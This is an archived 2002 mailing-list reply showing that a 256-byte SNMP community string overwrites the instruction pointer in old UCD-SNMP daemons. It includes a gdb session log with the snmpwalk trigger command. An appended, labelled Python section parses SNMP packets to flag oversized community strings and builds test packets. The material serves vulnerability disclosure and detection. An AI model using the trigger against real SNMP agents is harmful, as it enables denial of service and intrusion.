Re: Exploiting SNMP?

From: H D Moore (slistat_private)
Date: Fri Feb 15 2002 - 11:16:51 PST

On Thursday 14 February 2002 12:36 pm, foobat_private wrote:
> Has anyone tried exploiting the SNMP problems disclosed in the recent CERT
> notice, and originally investigated by the University of Oulu?

The UCD-SNMP 4.2.1 package is trivial to exploit. A community string of
exactly 256 bytes will smash eip. All testing was done on Linux, with both
the Red Hat 7.1 RPM and the source installs of 4.2.1. Every version prior to
4.2.2 seems to be vulnerable to this (except some of the OBSD versions).

Here is a quick session log, showing eip being overwritten in ucd 4.0.1:
    
[root@penny /root]# snmpd -version
[root@penny /root]# snmpd
[root@penny /root]# ps ax | grep snmpd
20279 pts/0    S      0:00 snmpd
20283 pts/0    S      0:00 grep snmpd
[root@penny /root]# which snmpd
/usr/sbin/snmpd
[root@penny /root]# gdb /usr/sbin/snmpd
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...(no debugging symbols
found)...
(gdb) attach 20279
Attaching to program: /usr/sbin/snmpd, Pid 20279
Reading symbols from /usr/lib/libsnmp.so.0...(no debugging symbols
found)...done.
Reading symbols from /lib/libnsl.so.1...done.
Reading symbols from /usr/lib/librpm.so.0...done.
Reading symbols from /lib/libdb.so.2...done.
Reading symbols from /usr/lib/libz.so.1...done.
Reading symbols from /lib/libm.so.6...done.
Reading symbols from /lib/libc.so.6...c
done.
Reading symbols from /usr/lib/libbz2.so.0...done.
Reading symbols from /lib/ld-linux.so.2...done.
Reading symbols from /lib/libnss_files.so.2...done.
0x29b54e in __select () from /lib/libc.so.6
(gdb) c
Continuing.

In another terminal:
[root@penny /root]# snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'`

Back to gdb:

Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb)
UCD-snmp version:  4.0.1
Author:            Wes Hardaker
Email:             ucd-snmp-coders@ucd-snmp.ucdavis.edu
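Added example, not part of the original post or of UCD-SNMP: a minimal BER parser that pulls the community string out of an SNMPv1/v2c datagram so a monitor or test harness can flag the 256-byte strings the post describes before they reach a vulnerable agent. The packet builder at the end is a constructed helper for offline testing; the 256-byte threshold is the crash length quoted above, not a protocol limit.

```python
# Added example (not from the original post): BER-walk an SNMPv1/v2c datagram,
# extract the community string and flag oversized ones for detection purposes.

def _ber_len(buf, i):
    """Decode a BER length at buf[i]; return (length, index_after_length)."""
    first = buf[i]
    if first < 0x80:                      # short form
        return first, i + 1
    n = first & 0x7F                      # long form: n length bytes follow
    return int.from_bytes(buf[i + 1:i + 1 + n], "big"), i + 1 + n

def _tlv(buf, i):
    """Return (tag, value_bytes, index_after_value) for the TLV at buf[i]."""
    tag = buf[i]
    length, j = _ber_len(buf, i + 1)
    return tag, buf[j:j + length], j + length

def community_string(datagram):
    """Community string of an SNMPv1 (0) or v2c (1) message, or None if malformed."""
    tag, body, _ = _tlv(datagram, 0)
    if tag != 0x30:                       # outer SEQUENCE
        return None
    tag, version, i = _tlv(body, 0)
    if tag != 0x02 or version not in (b"\x00", b"\x01"):   # INTEGER version
        return None
    tag, community, _ = _tlv(body, i)
    return community if tag == 0x04 else None              # OCTET STRING

def is_oversized_community(datagram, limit=256):
    """True when the community string is at least `limit` bytes long."""
    c = community_string(datagram)
    return c is not None and len(c) >= limit

def _ber_encode(tag, value):
    """Encode one TLV, using long-form length when needed (constructed helper)."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value

def build_v1_get(community, request_id=1):
    """Constructed SNMPv1 GetRequest with an empty varbind list, for testing only."""
    pdu = _ber_encode(0xA0, _ber_encode(0x02, bytes([request_id]))
                      + _ber_encode(0x02, b"\x00")      # error-status
                      + _ber_encode(0x02, b"\x00")      # error-index
                      + _ber_encode(0x30, b""))         # varbinds
    return _ber_encode(0x30, _ber_encode(0x02, b"\x00")  # version 0 = SNMPv1
                       + _ber_encode(0x04, community) + pdu)
```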